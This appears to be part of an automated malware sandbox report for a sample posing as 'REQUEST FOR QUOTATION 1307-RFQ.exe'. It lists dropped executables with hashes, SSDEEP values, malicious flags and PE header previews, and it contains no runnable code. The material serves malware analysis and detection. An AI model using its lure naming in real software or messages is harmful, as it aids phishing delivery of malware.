                                                                                                                                                                                                                            Entropy (8bit):4.683348098155314
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:j9GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:j9GJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:95B91FACFA2553E088397F5D45544CBA
                                                                                                                                                                                                                            SHA1:978451241A3D0ABB0C492D4A4AD1E62A689E211A
                                                                                                                                                                                                                            SHA-256:756594586EAC41726DA15FACE4A6F1CF4E1951DDEF22C027861CF81A819AE573
                                                                                                                                                                                                                            SHA-512:29384EE3A6463E142EF5F0141D0ED0CC28275924CF8BE1E84E1BF95FCAAB500AFCF7B5D920E11AC30F59B0D1DB78BECBED72F8E3B2DEC76DB08873E67922CD7E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@..........................`......Z............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...............P..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1801216
                                                                                                                                                                                                                            Entropy (8bit):6.967334718477165
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:7wVFr68Vw9wn/6h8p1zidVJLeQVPyzc+E7xQ2l:7wVFrssCndV1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:46464B0DFA3DB2510FE14D5EF738D11F
                                                                                                                                                                                                                            SHA1:394793FC4D1D7F5AEEDF9392801034DDAC4F331E
                                                                                                                                                                                                                            SHA-256:55F9CC272674232D1C2682122222C4D5113069517DB0B9F6A68ECD017768C206
                                                                                                                                                                                                                            SHA-512:CDCF6FBDAB1C612FF2997F5645FE0C9FAEDA6999A3884798CD7BE746CD086EA731EB03FF4402D6C3502E8CA15DF4C4FC89722430A2340FDF886ACDFCCFBC2682
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.....................................b.... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1348608
                                                                                                                                                                                                                            Entropy (8bit):7.245308606450502
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:kQW4qoNUgslKNX0Ip0MgHCp+MBOuJGJ0eeQ2yPyzc+E7xonyVGc/dT5N:kQW9BKNX0IPgi8MBOukJLeQVPyzc+E71
                                                                                                                                                                                                                            MD5:15CAEE52ED0777ABF3C8D97EE4818BB1
                                                                                                                                                                                                                            SHA1:FA8FD9C4BFEFA75DD4FBA2C8F350CC2C7044D79E
                                                                                                                                                                                                                            SHA-256:7CA0C602474353919865FF29FF3048F09C1702A12ADD111029B021E33B224D47
                                                                                                                                                                                                                            SHA-512:2186A284860E0FFF54B5AB6EBDD6B15D8BEA4B84C51DBA797964146EAF374CEE157C157981BE7B09709925498F80D59BDDAADCD2C143913762F1A2C89DB8AC65
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1330688
                                                                                                                                                                                                                            Entropy (8bit):4.822841472865012
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:m2G7AbHjk8GJ0eeQ2yPyzc+E7xonyVGc/dT5N:m2G7AbHjCJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:F1CB0A0C4D6E9E6EAAD3B76B1716C079
                                                                                                                                                                                                                            SHA1:A9273F2335873D0968EB0B1495AAA1FD25CEEF2F
                                                                                                                                                                                                                            SHA-256:09D695641B2E2287F730C717EC0F7BFDCD45E61EC5EFDDC67874C5BA8ECE0AD0
                                                                                                                                                                                                                            SHA-512:53172EB4999C78058420DDC0ACDDE03BB0C6098B1B2AE1B07976AFDA228D5256439E9354BEA376B2B3EEC1492928C3CB6D43D857B38E491B994C956E9286DECE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................<I.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1242624
                                                                                                                                                                                                                            Entropy (8bit):7.280859649553077
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:vkdpSI+K3S/GWei+qNv2wG3EGJ0eeQ2yPyzc+E7xonyVGc/dT5N:v6SIGGWei2wG3bJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:1B98ADE6B240EAC1ED51A8847FC157EB
                                                                                                                                                                                                                            SHA1:28543D0E281A95DD16434263F8F5343836BC6784
                                                                                                                                                                                                                            SHA-256:3FA4786B53C71DCEF84879AB6FD6011B71EAF04E950C7E195CCC2067E47372DC
                                                                                                                                                                                                                            SHA-512:112AB9AAE7A730F624C84EE76830C3167285B40A9803C083448CC839AF8D916D558067119DB3DD0FD4FB6E1735E6A9EAB96D5FA0049234FB5CC511A888A1E331
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......(..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1247744
                                                                                                                                                                                                                            Entropy (8bit):4.662135810541899
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:ghGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:ghGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:1A71445017EDEBF6811D579BE5438F3B
                                                                                                                                                                                                                            SHA1:B27E96FB560D2FC1A9295FDC14DA1D4EFE6855B8
                                                                                                                                                                                                                            SHA-256:A66F9C5C9B8D5BF1D949FFDA18694AC53F4F57D8E1F9074442895A2E4AB268C4
                                                                                                                                                                                                                            SHA-512:8D3E84143C0BF4A2D78E21768F61C826A46F1730954AEBE96767DA022EF4312EDFBAB987F0EC1AFEF613663CE690A10988B3017B2F0558D889E5A12512425161
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.............................@.......#.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc.......`.......*..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):0.32245258200109317
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:nQcXl80kqF69Fq5zx46CzE5Z2+fqjFjQcXn:Qv1ziY+fCEE
                                                                                                                                                                                                                            MD5:04BBB4AF834435C9541C0285B6011826
                                                                                                                                                                                                                            SHA1:0A48D284FB21C14A3D19C1251A9D12AE94B41B20
                                                                                                                                                                                                                            SHA-256:DF508AE6FF7E98C6D41FC8435325FEDDB369542FCA3B47AD3B89DB6FDB2E2DBF
                                                                                                                                                                                                                            SHA-512:0C85ECC59C82A412DEDE5B15250A30A8B1CCB7A21093A7E93815D3D70C40B8DAFAEAE580D1E2B7267DB8FF13A50ED07F7E78EC62659EE79A504E92716695C3B7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.@..X...X.......................................X...!...............................p...5}.f.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O................O..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.....p...5}.f............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1617920
                                                                                                                                                                                                                            Entropy (8bit):4.941667824273141
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:fAL3UTsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:fAL3UnJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:33B97B079F45CE82E6F4A328EBAB3909
                                                                                                                                                                                                                            SHA1:B863F9190DF0E214D98B3FF77A68291AB65A6294
                                                                                                                                                                                                                            SHA-256:49777D1C6BC66037560304DB0C1E3F99C1FA6AEB8D24D2C03A44C7F1ADD0C0EE
                                                                                                                                                                                                                            SHA-512:CE43522701C88910BE3A4675652847D2B88776D7397BA578C31A25DE21FAD355ACDEEB218D1115FD12E6D1F752359EF849689DAC2E1C7A2D1EFC2E2822810697
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................$........... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc.......0......................@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1342464
                                                                                                                                                                                                                            Entropy (8bit):4.843534574559916
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:gpFtvOwGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:IOwGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:5A764611EA22446F05BB79BB3366106F
                                                                                                                                                                                                                            SHA1:720FA2CA41D675DBA90D3AAE227F8B6A97B39799
                                                                                                                                                                                                                            SHA-256:F7386533EF0EE5337E55F4AD08E4D25829DC59C35BFFC96144E3668258A0BA14
                                                                                                                                                                                                                            SHA-512:F12B478BA1AFCD99C2AA5CC8F0D90E58701BB368FF935C228D923141A6C7341780967F4E3807E2F187685D8016D27758C471ADBC6F9D0A0E22395E87D98308CA
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.....................................c.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1513984
                                                                                                                                                                                                                            Entropy (8bit):7.094329110638084
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:g3frCoQ9tLsiLPLe24CxruW4bIhllsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:g3fIsIPLkCNuVbIhDzJLeQVPyzc+E7xX
                                                                                                                                                                                                                            MD5:FBCDE969FF49C7FE7B5D597525F34B1A
                                                                                                                                                                                                                            SHA1:A0B72B57077A8A0B0ADCFD0AEFDF32ECC2B96F4D
                                                                                                                                                                                                                            SHA-256:429071959EA272AF36AAF7FDA08CB290279CE754992356DBEEB5934C035F69EE
                                                                                                                                                                                                                            SHA-512:E5F54764F889B5648B766CAF44ECA1B31497F917906B934537BAD2CB4E9AEC154414E77B3D238E2BE507DC90C24D1870FF143A22A5ECFBF91716EA4992F19191
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1846784
                                                                                                                                                                                                                            Entropy (8bit):6.932792915114502
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:tF2YuHNETovAvNYf8km4JLeQVPyzc+E7xQ2l:46BCf8kH1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:FEE7BE523832A1DAA28153EE09159969
                                                                                                                                                                                                                            SHA1:592805ADAC7FBD77D3A420260FBBDAD94FE39B09
                                                                                                                                                                                                                            SHA-256:94A76E9A41B7D850C7B8E66CB48BDDEF001F205DF37015631C3A71096C238BDE
                                                                                                                                                                                                                            SHA-512:B259A3082A088F42E8B48544125670FC81D5C883BB8139A3B2F97C37FC62AE78751CED8FFF4A29487673A7B5A675560EB659B1F55C1DB7D76A7D111E74C0A88E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......b.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1455616
                                                                                                                                                                                                                            Entropy (8bit):7.230997825801809
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:kiW6ZvAKF5i/dN9Bde9j9Trk+FwGJ0eeQ2yPyzc+E7xonyVGc/dT5N:kYxF50b9Bdu9TxtJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:FC42F22F248DDF97255574928099BD4E
                                                                                                                                                                                                                            SHA1:24649B599CBA502441B0E18C22DF2F469C582F6D
                                                                                                                                                                                                                            SHA-256:349369D4A91F138E31FD15CA0D9AA51D2B106E120B052FCDB9FA83F3F06B005E
                                                                                                                                                                                                                            SHA-512:8FC957E1711B28668525253E2AF544F7E8FA86BA8B993F87034AEF92EFDD5B4D3A6628FE2942A75FA4FCA7CA4D9F997DE7B4052A8EFD62668BC560C2D3E0A53F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................U.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1562112
                                                                                                                                                                                                                            Entropy (8bit):5.175307849002714
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:3JnJ5D3WXXGJ0eeQ2yPyzc+E7xonyVGc/dT5N:3JnJ5DGXWJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:0EFAE9B5227A7ADB6C73C07C5181848C
                                                                                                                                                                                                                            SHA1:BB0D4266CF13BB6DA312BC8E41A6C72E1A21A720
                                                                                                                                                                                                                            SHA-256:C89D16F0C2AD5926FEE3CDF279671C75AE165EFAC259064978DFC4352057D7AB
                                                                                                                                                                                                                            SHA-512:8865516C5C3CE057255D0166F036435FE3829D3BF065801A075EF709652A3E92B22A2490D8E1000D5F23456D9BA4C0E74DF159FE2115F3E9C9F517C2DA3E3322
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.............................."........... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc.......0......................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2075136
                                                                                                                                                                                                                            Entropy (8bit):6.73056911190643
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:xPK8mJYTerDjfJ2313e1mP1MdnUhJLeQVPyzc+E7xQ2l:f1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:F64A7F0228CA7B00AB6AED1F6D538F70
                                                                                                                                                                                                                            SHA1:BD3F29B16FD8DE6037AB0DF222D3FBCEF7B24FEF
                                                                                                                                                                                                                            SHA-256:F535C77176EC3EA6EB131C31D930CBE197F370872DF43292031D30B70B6B2A90
                                                                                                                                                                                                                            SHA-512:43A8A340E00C2919A07DD7591756C6D6B3CFC5BE37453E79DAF238FC0F7AFFA030A7F95991CFAB288C1D2A950148206575FD2274C7921A2B3B548DB91FEC3F7F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....O..... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1332224
                                                                                                                                                                                                                            Entropy (8bit):4.8232017234080775
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:VEP3RnDGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WnDGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:81093F4AEBE45D63048591DC7BC8A814
                                                                                                                                                                                                                            SHA1:CB1ACB408B237F5B382A8AEF7B7BD74B16C2A83C
                                                                                                                                                                                                                            SHA-256:BA64D5B1F7401EC2394FE0F700D64E352A92C4C70E91848DD189317C820CDD2C
                                                                                                                                                                                                                            SHA-512:30D12B9DE5BEB44F6E2FEAD0C46FEFDC51B51157C4554730C814B41BAB8C021C72CFBB8F03E29F4C3763331FDA0ADD4D7DF0DEE15E02CC985C9CEB038C27123B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1384960
                                                                                                                                                                                                                            Entropy (8bit):4.816911468727054
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:TjkyqGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:TIyqGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:84AD1165D1CC1C542C535B1CFAB6AD15
                                                                                                                                                                                                                            SHA1:C821A615B71E36EB6C2CA1907103BE690CF1A176
                                                                                                                                                                                                                            SHA-256:FE9E869FE8858123E8404B4D03311C79C58039A2C9A782FA64496A9B049A11A6
                                                                                                                                                                                                                            SHA-512:C978EDE36233F54D007AF20A968300401A00D4A26366774F7959F9CF80CB98C47DDC02B97CD61DFA2C2630BC2751F08A9602742CEFCD0A33EB154232885E0348
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................T}.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...............B..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1306112
                                                                                                                                                                                                                            Entropy (8bit):4.740883155962809
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:A4KsGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WsGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:66AB3874C794734AF03CC2F0BAC30184
                                                                                                                                                                                                                            SHA1:020E9A0DE7D946697E8431C99456308B7A465645
                                                                                                                                                                                                                            SHA-256:DC0FF81A7CB2D9F0047FB055A055955B60CEC691F0D3DF9AAD158CF5CFB94620
                                                                                                                                                                                                                            SHA-512:9C85E25B0C9D9D0AF9EDBBD4BDCD64861F96B18CB4FA14BE22C6374A1BE72FC5655DA3E225B02114E01C105292DDC964752BAD99EAC1CFF7FC6E32ED1954EE17
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.............................@............ .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc.......`......................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1253376
                                                                                                                                                                                                                            Entropy (8bit):4.673197063902164
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:EyAGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:RAGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:D48C35119955A40BE97FC32494D6DEB1
                                                                                                                                                                                                                            SHA1:D2311C1150229FF41D5C9487D32002EEB2357FA1
                                                                                                                                                                                                                            SHA-256:1A0E07343ECB88893160B81B0FF87A1215E87A8EC631E412488A4CA15F9C60CA
